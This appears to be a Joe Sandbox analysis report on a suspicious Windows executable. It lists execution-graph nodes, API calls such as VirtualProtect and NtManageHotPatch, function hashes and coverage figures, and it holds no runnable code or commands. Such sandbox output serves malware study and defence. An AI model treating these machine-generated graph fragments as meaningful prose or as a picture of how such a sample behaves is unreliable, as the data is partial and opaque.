4539->4540 4541 7ff701161394 2 API calls 4540->4541 4542 7ff701161558 4541->4542 4543 7ff70116155d 4542->4543 4544 7ff701161394 2 API calls 4542->4544 4545 7ff701161394 2 API calls 4543->4545 4544->4543 4546 7ff701161567 4545->4546 4547 7ff70116156c 4546->4547 4548 7ff701161394 2 API calls 4546->4548 4549 7ff701161394 2 API calls 4547->4549 4548->4547 4550 7ff701161576 4549->4550 4551 7ff70116157b 4550->4551 4552 7ff701161394 2 API calls 4550->4552 4553 7ff701161394 2 API calls 4551->4553 4552->4551 4554 7ff701161585 4553->4554 4555 7ff70116158a 4554->4555 4556 7ff701161394 2 API calls 4554->4556 4557 7ff701161394 2 API calls 4555->4557 4556->4555 4558 7ff701161599 4557->4558 4559 7ff701161394 2 API calls 4558->4559 4560 7ff7011615a3 4559->4560 4561 7ff7011615a8 4560->4561 4562 7ff701161394 2 API calls 4560->4562 4563 7ff701161394 2 API calls 4561->4563 4562->4561 4564 7ff7011615b7 4563->4564 4565 7ff701161394 2 API calls 4564->4565 4566 7ff7011615c1 4565->4566 4567 7ff7011615c6 4566->4567 4568 7ff701161394 2 API calls 4566->4568 4569 7ff701161394 2 API calls 4567->4569 4568->4567 4570 7ff7011615d0 4569->4570 4571 7ff7011615d5 4570->4571 4572 7ff701161394 2 API calls 4570->4572 4573 7ff701161394 2 API calls 4571->4573 4572->4571 4574 7ff7011615df 4573->4574 4575 7ff701161394 2 API calls 4574->4575 4576 7ff7011615e4 4575->4576 4577 7ff701161394 2 API calls 4576->4577 4578 7ff7011615f3 4577->4578 4578->3913 4578->3917 4580 7ff701161394 2 API calls 4579->4580 4581 7ff701161486 4580->4581 4582 7ff70116148b 4581->4582 4583 7ff701161394 2 API calls 4581->4583 4584 7ff701161394 2 API calls 4582->4584 4583->4582 4585 7ff701161495 4584->4585 4586 7ff70116149a 4585->4586 4587 7ff701161394 2 API calls 4585->4587 4588 7ff701161394 2 API calls 4586->4588 4587->4586 4589 7ff7011614a4 4588->4589 4590 7ff7011614a9 4589->4590 4591 7ff701161394 2 API calls 4589->4591 4592 7ff701161394 2 API calls 4590->4592 4591->4590 4593 7ff7011614b3 4592->4593 4594 7ff7011614b8 4593->4594 4595 7ff701161394 2 API calls 4593->4595 4596 7ff701161394 2 API calls 4594->4596 4595->4594 4597 7ff7011614c2 4596->4597 4598 7ff7011614c7 4597->4598 4599 7ff701161394 2 API calls 4597->4599 4600 7ff701161394 2 API calls 4598->4600 4599->4598 4601 7ff7011614d6 4600->4601 4602 7ff701161394 2 API calls 4601->4602 4603 7ff7011614e0 4602->4603 4604 7ff701161394 2 API calls 4603->4604 4605 7ff7011614e5 4604->4605 4606 7ff701161394 2 API calls 4605->4606 4607 7ff7011614f4 4606->4607 4608 7ff701161394 2 API calls 4607->4608 4609 7ff701161503 4608->4609 4610 7ff701161394 2 API calls 4609->4610 4611 7ff701161512 4610->4611 4612 7ff701161394 2 API calls 4611->4612 4613 7ff701161521 4612->4613 4614 7ff701161530 4613->4614 4615 7ff701161394 2 API calls 4613->4615 4616 7ff701161394 2 API calls 4614->4616 4615->4614 4617 7ff70116153a 4616->4617 4618 7ff70116153f 4617->4618 4619 7ff701161394 2 API calls 4617->4619 4620 7ff701161394 2 API calls 4618->4620 4619->4618 4621 7ff70116154e 4620->4621 4622 7ff701161394 2 API calls 4621->4622 4623 7ff701161558 4622->4623 4624 7ff70116155d 4623->4624 4625 7ff701161394 2 API calls 4623->4625 4626 7ff701161394 2 API calls 4624->4626 4625->4624 4627 7ff701161567 4626->4627 4628 7ff70116156c 4627->4628 4629 7ff701161394 2 API calls 4627->4629 4630 7ff701161394 2 API calls 4628->4630 4629->4628 4631 7ff701161576 4630->4631 4632 7ff70116157b 4631->4632 4633 7ff701161394 2 API calls 4631->4633 4634 7ff701161394 2 API calls 4632->4634 4633->4632 4635 7ff701161585 4634->4635 4636 7ff70116158a 4635->4636 4637 7ff701161394 2 API calls 4635->4637 4638 7ff701161394 2 API calls 4636->4638 4637->4636 4639 7ff701161599 4638->4639 4640 7ff701161394 2 API calls 4639->4640 4641 7ff7011615a3 4640->4641 4642 7ff7011615a8 4641->4642 4643 7ff701161394 2 API calls 4641->4643 4644 7ff701161394 2 API calls 4642->4644 4643->4642 4645 7ff7011615b7 4644->4645 4646 7ff701161394 2 API calls 4645->4646 4647 7ff7011615c1 4646->4647 4648 7ff7011615c6 4647->4648 4649 7ff701161394 2 API calls 4647->4649 4650 7ff701161394 2 API calls 4648->4650 4649->4648 4651 7ff7011615d0 4650->4651 4652 7ff7011615d5 4651->4652 4653 7ff701161394 2 API calls 4651->4653 4654 7ff701161394 2 API calls 4652->4654 4653->4652 4655 7ff7011615df 4654->4655 4656 7ff701161394 2 API calls 4655->4656 4657 7ff7011615e4 4656->4657 4658 7ff701161394 2 API calls 4657->4658 4659 7ff7011615f3 4658->4659 4659->3922 4661 7ff701161394 2 API calls 4660->4661 4662 7ff7011615d0 4661->4662 4663 7ff7011615d5 4662->4663 4664 7ff701161394 2 API calls 4662->4664 4665 7ff701161394 2 API calls 4663->4665 4664->4663 4666 7ff7011615df 4665->4666 4667 7ff701161394 2 API calls 4666->4667 4668 7ff7011615e4 4667->4668 4669 7ff701161394 2 API calls 4668->4669 4670 7ff7011615f3 4669->4670 4670->3923 4708 7ff701162320 strlen 4709 7ff701162337 4708->4709 4727 7ff701161000 4728 7ff70116108b __set_app_type 4727->4728 4729 7ff701161040 4727->4729 4730 7ff7011610b6 4728->4730 4729->4728 4731 7ff7011610e5 4730->4731 4733 7ff701161e00 4730->4733 4734 7ff701168860 __setusermatherr 4733->4734 4735 7ff701161800 4736 7ff701161812 4735->4736 4737 7ff701161835 fprintf 4736->4737 2895 7ff701161394 2899 7ff7011682d0 2895->2899 2897 7ff7011613b8 2898 7ff7011613c6 NtManageHotPatch 2897->2898 2900 7ff7011682ee 2899->2900 2901 7ff70116831b 2899->2901 2900->2897 2901->2900 2903 7ff7011683c3 2901->2903 2902 7ff7011683df malloc 2904 7ff701168400 2902->2904 2903->2902 2904->2900 4710 7ff701161ab3 4711 7ff701161ade 4710->4711 4712 7ff701161b36 4711->4712 4715 7ff701161a0f 4711->4715 4716 7ff70116199e 4711->4716 4713 7ff701161ba0 4 API calls 4712->4713 4714 7ff701161b53 4713->4714 4716->4715 4717 7ff7011619e9 VirtualProtect 4716->4717 4717->4716 4692 7ff701162050 4693 7ff70116205e EnterCriticalSection 4692->4693 4694 7ff7011620cf 4692->4694 4695 7ff7011620c2 LeaveCriticalSection 4693->4695 4696 7ff701162079 4693->4696 4695->4694 4696->4695 4697 7ff7011620bd free 4696->4697 4697->4695 4698 7ff701161fd0 4699 7ff701162033 4698->4699 4700 7ff701161fe4 4698->4700 4700->4699 4701 7ff701161ffd EnterCriticalSection LeaveCriticalSection 4700->4701 4701->4699 4738 7ff701161e10 4739 7ff701161e2f 4738->4739 4740 7ff701161ecc 4739->4740 4741 7ff701161eb5 4739->4741 4743 7ff701161e55 4739->4743 4740->4741 4742 7ff701161ed3 signal 4740->4742 4742->4741 4744 7ff701161ee4 4742->4744 4743->4741 4746 7ff701161f12 signal 4743->4746 4744->4741 4745 7ff701161eea signal 4744->4745 4745->4741 4746->4741 4760 7ff701161a70 4762 7ff70116199e 4760->4762 4764 7ff701161a7d 4760->4764 4761 7ff701161a0f 4762->4761 4763 7ff7011619e9 VirtualProtect 4762->4763 4763->4762 4765 7ff70116216f 4766 7ff701162178 InitializeCriticalSection 4765->4766 4767 7ff701162185 4765->4767 4766->4767

                                                        Executed Functions

                                                        Function 00007FF701161160 Relevance: 13.6, APIs: 9, Instructions: 130sleepstringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2188621766.00007FF701161000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF701160000, based on PE: true
                                                        • Associated: 00000018.00000002.2188594606.00007FF701160000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188647305.00007FF701169000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188674621.00007FF70116B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188907800.00007FF7013E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188925400.00007FF7013EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff701160000_lwmyuxxpdkdz.jbxd
                                                        Similarity
                                                        • API ID: malloc$ExceptionFilterSleepUnhandled_amsg_exit_cexit_inittermmemcpystrlen
                                                        • String ID:
                                                        • API String ID: 2643109117-0
                                                        • Opcode ID: 19a9fb927d1e6cd504815deac6584628b56f7f6ee1b9ed6be7109d8e51d185c5
                                                        • Instruction ID: 6f40f79caf2dcdff54d843ffdc4936b84d88b7513e5e7c06d1edbc3a6e842816
                                                        • Opcode Fuzzy Hash: 19a9fb927d1e6cd504815deac6584628b56f7f6ee1b9ed6be7109d8e51d185c5
                                                        • Instruction Fuzzy Hash: B5515575A19B0695FB18BB25FD503B9E3A5BF88784F809035CA0D833A1DFBEA4518360
                                                        Function 00007FF701161394 Relevance: 1.5, APIs: 1, Instructions: 24nativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • NtManageHotPatch.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF701161156), ref: 00007FF7011613F7
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2188621766.00007FF701161000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF701160000, based on PE: true
                                                        • Associated: 00000018.00000002.2188594606.00007FF701160000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188647305.00007FF701169000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188674621.00007FF70116B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188907800.00007FF7013E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188925400.00007FF7013EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff701160000_lwmyuxxpdkdz.jbxd
                                                        Similarity
                                                        • API ID: ManagePatch
                                                        • String ID:
                                                        • API String ID: 863949556-0
                                                        • Opcode ID: 0328bc8ef6a53200854c36a9a6d061530187d3d5cbec243a2c25dcd54762ec6b
                                                        • Instruction ID: 24d18318abf6459c782bb5039b9639707ab948e91b45861f676a6c94a14994fb
                                                        • Opcode Fuzzy Hash: 0328bc8ef6a53200854c36a9a6d061530187d3d5cbec243a2c25dcd54762ec6b
                                                        • Instruction Fuzzy Hash: 0CF0B272A0CB4682D718EB51FC4002ABBB0FF98380B404839EA9C82725DFBDE050CB64

                                                        Non-executed Functions

                                                        Function 00007FF701163350 Relevance: 21.2, APIs: 9, Strings: 5, Instructions: 206COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2188621766.00007FF701161000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF701160000, based on PE: true
                                                        • Associated: 00000018.00000002.2188594606.00007FF701160000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188647305.00007FF701169000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188674621.00007FF70116B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188907800.00007FF7013E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188925400.00007FF7013EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff701160000_lwmyuxxpdkdz.jbxd
                                                        Similarity
                                                        • API ID: memset$wcscatwcscpywcslen
                                                        • String ID: $0$0$@$@
                                                        • API String ID: 4263182637-1413854666
                                                        • Opcode ID: 6af65850cbe7cf858f5459e650824eeb499f5a742452982e0f30e052dc73b0d0
                                                        • Instruction ID: 5b489c7c63140a25023f580e88a1a5fa58824b2cb63115956e2636f7495abf1a
                                                        • Opcode Fuzzy Hash: 6af65850cbe7cf858f5459e650824eeb499f5a742452982e0f30e052dc73b0d0
                                                        • Instruction Fuzzy Hash: 2CB17E2191CBC285F725AB25F8453BAF7A0FF90348F805239EA8C52695DFBED145CB60
                                                        Function 00007FF701162690 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 322COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2188621766.00007FF701161000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF701160000, based on PE: true
                                                        • Associated: 00000018.00000002.2188594606.00007FF701160000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188647305.00007FF701169000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188674621.00007FF70116B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188907800.00007FF7013E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188925400.00007FF7013EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff701160000_lwmyuxxpdkdz.jbxd
                                                        Similarity
                                                        • API ID: wcslen$memsetwcscatwcscpywcsncmp
                                                        • String ID: 0$X$`
                                                        • API String ID: 329590056-2527496196
                                                        • Opcode ID: 3e74067d2b8f6d9820809deb9a400a2305a428e80b628bc07cd27e0f0585ba98
                                                        • Instruction ID: 9ad42e07f897b08dfcc8b41e645dc698d8cabf70221ccc5386f170d998d9c566
                                                        • Opcode Fuzzy Hash: 3e74067d2b8f6d9820809deb9a400a2305a428e80b628bc07cd27e0f0585ba98
                                                        • Instruction Fuzzy Hash: 14026C22908B8181E720AB19FC443AAF7A4FF857A8F804239EA9C477E5DFBDD145C750
                                                        Function 00007FF701161BA0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 106memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • VirtualQuery.KERNEL32(?,?,?,?,00007FF70116A4C4,00007FF70116A4C4,?,?,00007FF701160000,?,00007FF701161991), ref: 00007FF701161C63
                                                        • VirtualProtect.KERNEL32(?,?,?,?,00007FF70116A4C4,00007FF70116A4C4,?,?,00007FF701160000,?,00007FF701161991), ref: 00007FF701161CC7
                                                        • memcpy.MSVCRT ref: 00007FF701161CE0
                                                        • GetLastError.KERNEL32(?,?,?,?,00007FF70116A4C4,00007FF70116A4C4,?,?,00007FF701160000,?,00007FF701161991), ref: 00007FF701161D23
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2188621766.00007FF701161000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF701160000, based on PE: true
                                                        • Associated: 00000018.00000002.2188594606.00007FF701160000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188647305.00007FF701169000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188674621.00007FF70116B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188907800.00007FF7013E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188925400.00007FF7013EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff701160000_lwmyuxxpdkdz.jbxd
                                                        Similarity
                                                        • API ID: Virtual$ErrorLastProtectQuerymemcpy
                                                        • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                                        • API String ID: 2595394609-2123141913
                                                        • Opcode ID: 7e47fe0a3cc757937b184265145bdf76f8034c5237edb91b9583e5a857b50cbf
                                                        • Instruction ID: f35faa150b09a134261aa54fb586c400c9b6e85fde707cb40ddb8aea6e93765a
                                                        • Opcode Fuzzy Hash: 7e47fe0a3cc757937b184265145bdf76f8034c5237edb91b9583e5a857b50cbf
                                                        • Instruction Fuzzy Hash: A1419061A08A4691EB18AB05FC446BCB7A0EF95BC4FD48436CE0D83795DFBEE541C360
                                                        Function 00007FF701162104 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2188621766.00007FF701161000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF701160000, based on PE: true
                                                        • Associated: 00000018.00000002.2188594606.00007FF701160000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188647305.00007FF701169000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188674621.00007FF70116B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188907800.00007FF7013E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188925400.00007FF7013EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff701160000_lwmyuxxpdkdz.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$DeleteEnterErrorLastLeaveValuefree
                                                        • String ID:
                                                        • API String ID: 3326252324-0
                                                        • Opcode ID: a73ea2713171e8a047f8eee55ea44c161dcaa9f159f1f4536ae8616b18553079
                                                        • Instruction ID: 05fcfb0f62414ccdc21330374a0ed9787120dfe9a8742f8f79d91e58fbc29ec0
                                                        • Opcode Fuzzy Hash: a73ea2713171e8a047f8eee55ea44c161dcaa9f159f1f4536ae8616b18553079
                                                        • Instruction Fuzzy Hash: B321C924A09A0281FB19BB01FD45374F6A1BF20B95FC44039C90D576A4DFBEB846C360
                                                        Function 00007FF701161E10 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 640 7ff701161e10-7ff701161e2d 641 7ff701161e3e-7ff701161e48 640->641 642 7ff701161e2f-7ff701161e38 640->642 644 7ff701161e4a-7ff701161e53 641->644 645 7ff701161ea3-7ff701161ea8 641->645 642->641 643 7ff701161f60-7ff701161f69 642->643 646 7ff701161ecc-7ff701161ed1 644->646 647 7ff701161e55-7ff701161e60 644->647 645->643 648 7ff701161eae-7ff701161eb3 645->648 651 7ff701161f23-7ff701161f2d 646->651 652 7ff701161ed3-7ff701161ee2 signal 646->652 647->645 649 7ff701161efb-7ff701161f0a call 7ff701168870 648->649 650 7ff701161eb5-7ff701161eba 648->650 649->651 661 7ff701161f0c-7ff701161f10 649->661 650->643 656 7ff701161ec0 650->656 654 7ff701161f43-7ff701161f45 651->654 655 7ff701161f2f-7ff701161f3f 651->655 652->651 657 7ff701161ee4-7ff701161ee8 652->657 654->643 662 7ff701161f5a 655->662 656->651 659 7ff701161f4e-7ff701161f53 657->659 660 7ff701161eea-7ff701161ef9 signal 657->660 659->662 660->643 663 7ff701161f55 661->663 664 7ff701161f12-7ff701161f21 signal 661->664 662->643 663->662 664->643 664->651
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2188621766.00007FF701161000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF701160000, based on PE: true
                                                        • Associated: 00000018.00000002.2188594606.00007FF701160000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188647305.00007FF701169000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188674621.00007FF70116B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188907800.00007FF7013E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188925400.00007FF7013EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff701160000_lwmyuxxpdkdz.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CCG
                                                        • API String ID: 0-1584390748
                                                        • Opcode ID: 1c404e41e50540ab740d17b3dba579019ccfa589ac9c58556def001b72d5d7d4
                                                        • Instruction ID: 0e0c077e2389ab9dc09b2f81cd16efe0846a4ed668a4d48396a6c82b26a59dbf
                                                        • Opcode Fuzzy Hash: 1c404e41e50540ab740d17b3dba579019ccfa589ac9c58556def001b72d5d7d4
                                                        • Instruction Fuzzy Hash: B121DE22F0C21651FB2DB324BD8037991819FD4764FA48575D90D833D4CFEEEC8982A2
                                                        Function 00007FF701161880 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF701161247), ref: 00007FF7011619F9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2188621766.00007FF701161000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF701160000, based on PE: true
                                                        • Associated: 00000018.00000002.2188594606.00007FF701160000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188647305.00007FF701169000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188674621.00007FF70116B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188907800.00007FF7013E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188925400.00007FF7013EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff701160000_lwmyuxxpdkdz.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                                        • API String ID: 544645111-395989641
                                                        • Opcode ID: 717b2846262b070cbf16f4917165f5bf06984c4257135dd60be662c50123eab4
                                                        • Instruction ID: 11f8f0382dc5f4d9ad9bcc1ebf58d3ffa01812db9a178edb1b67a0f406b6bf43
                                                        • Opcode Fuzzy Hash: 717b2846262b070cbf16f4917165f5bf06984c4257135dd60be662c50123eab4
                                                        • Instruction Fuzzy Hash: A1516F22E08546D6EB18AB21FC407B8B7A1EF54B98F849135D91C07794DFBEE481C720
                                                        Function 00007FF701161800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 698 7ff701161800-7ff701161810 699 7ff701161824 698->699 700 7ff701161812-7ff701161822 698->700 701 7ff70116182b-7ff701161867 call 7ff701162290 fprintf 699->701 700->701
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2188621766.00007FF701161000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF701160000, based on PE: true
                                                        • Associated: 00000018.00000002.2188594606.00007FF701160000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188647305.00007FF701169000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188674621.00007FF70116B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188907800.00007FF7013E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188925400.00007FF7013EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff701160000_lwmyuxxpdkdz.jbxd
                                                        Similarity
                                                        • API ID: fprintf
                                                        • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                        • API String ID: 383729395-3474627141
                                                        • Opcode ID: c3614a3824a7654001b9d39070aa49656cc15abf7340c2d830cf33f92ca81765
                                                        • Instruction ID: 604c85177740a2a0b961d12bb6668da54afa43531845160f020ef6917797ceb2
                                                        • Opcode Fuzzy Hash: c3614a3824a7654001b9d39070aa49656cc15abf7340c2d830cf33f92ca81765
                                                        • Instruction Fuzzy Hash: 2CF0C211E08A4982E714BB24BD410B9E361EF493D4F90D235DE4D53255DF6DE1828310
                                                        Function 00007FF70116219E Relevance: 5.0, APIs: 4, Instructions: 34COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000018.00000002.2188621766.00007FF701161000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF701160000, based on PE: true
                                                        • Associated: 00000018.00000002.2188594606.00007FF701160000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188647305.00007FF701169000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188674621.00007FF70116B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188907800.00007FF7013E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000018.00000002.2188925400.00007FF7013EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_24_2_7ff701160000_lwmyuxxpdkdz.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterErrorLastLeaveValue
                                                        • String ID:
                                                        • API String ID: 682475483-0
                                                        • Opcode ID: 4410bea657734efe7792d9b5e6ff5cd294ece7a39ccde5653083eadeaedea16a
                                                        • Instruction ID: 4fd915e376cc2f4d9b20d05994451e46c6902ce01cc12ae09bebad57e1f7c4fe
                                                        • Opcode Fuzzy Hash: 4410bea657734efe7792d9b5e6ff5cd294ece7a39ccde5653083eadeaedea16a
                                                        • Instruction Fuzzy Hash: 1501E825A0DA0282F71ABB11FD04274F2A0BF14B95FC48035CA0D536A4DFBEB996C260

                                                        Execution Graph

                                                        Execution Coverage:2.4%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:829
                                                        Total number of Limit Nodes:2
                                                        execution_graph 2830 140001ac3 2831 140001a70 2830->2831 2832 14000199e 2831->2832 2833 140001b36 2831->2833 2836 140001b53 2831->2836 2835 140001a0f 2832->2835 2837 1400019e9 VirtualProtect 2832->2837 2834 140001ba0 4 API calls 2833->2834 2834->2836 2837->2832 1998 140001ae4 1999 140001a70 1998->1999 2000 14000199e 1999->2000 2001 140001b36 1999->2001 2004 140001b53 1999->2004 2003 140001a0f 2000->2003 2005 1400019e9 VirtualProtect 2000->2005 2006 140001ba0 2001->2006 2005->2000 2008 140001bc2 2006->2008 2007 140001c04 memcpy 2007->2004 2008->2007 2010 140001c45 VirtualQuery 2008->2010 2011 140001cf4 2008->2011 2010->2011 2015 140001c72 2010->2015 2012 140001d23 GetLastError 2011->2012 2013 140001d37 2012->2013 2014 140001ca4 VirtualProtect 2014->2007 2014->2012 2015->2007 2015->2014 2038 140001404 2111 140001394 2038->2111 2040 140001413 2041 140001394 2 API calls 2040->2041 2042 140001422 2041->2042 2043 140001394 2 API calls 2042->2043 2044 140001431 2043->2044 2045 140001394 2 API calls 2044->2045 2046 140001440 2045->2046 2047 140001394 2 API calls 2046->2047 2048 14000144f 2047->2048 2049 140001394 2 API calls 2048->2049 2050 14000145e 2049->2050 2051 140001394 2 API calls 2050->2051 2052 14000146d 2051->2052 2053 140001394 2 API calls 2052->2053 2054 14000147c 2053->2054 2055 140001394 2 API calls 2054->2055 2056 14000148b 2055->2056 2057 140001394 2 API calls 2056->2057 2058 14000149a 2057->2058 2059 140001394 2 API calls 2058->2059 2060 1400014a9 2059->2060 2061 140001394 2 API calls 2060->2061 2062 1400014b8 2061->2062 2063 140001394 2 API calls 2062->2063 2064 1400014c7 2063->2064 2065 140001394 2 API calls 2064->2065 2066 1400014d6 2065->2066 2067 1400014e5 2066->2067 2068 140001394 2 API calls 2066->2068 2069 140001394 2 API calls 2067->2069 2068->2067 2070 1400014ef 2069->2070 2071 1400014f4 2070->2071 2072 140001394 2 API calls 2070->2072 2073 140001394 2 API calls 2071->2073 2072->2071 2074 1400014fe 2073->2074 2075 140001503 2074->2075 2076 140001394 2 API calls 2074->2076 2077 140001394 2 API calls 2075->2077 2076->2075 2078 14000150d 2077->2078 2079 140001394 2 API calls 2078->2079 2080 140001512 2079->2080 2081 140001394 2 API calls 2080->2081 2082 140001521 2081->2082 2083 140001394 2 API calls 2082->2083 2084 140001530 2083->2084 2085 140001394 2 API calls 2084->2085 2086 14000153f 2085->2086 2087 140001394 2 API calls 2086->2087 2088 14000154e 2087->2088 2089 140001394 2 API calls 2088->2089 2090 14000155d 2089->2090 2091 140001394 2 API calls 2090->2091 2092 14000156c 2091->2092 2093 140001394 2 API calls 2092->2093 2094 14000157b 2093->2094 2095 140001394 2 API calls 2094->2095 2096 14000158a 2095->2096 2097 140001394 2 API calls 2096->2097 2098 140001599 2097->2098 2099 140001394 2 API calls 2098->2099 2100 1400015a8 2099->2100 2101 140001394 2 API calls 2100->2101 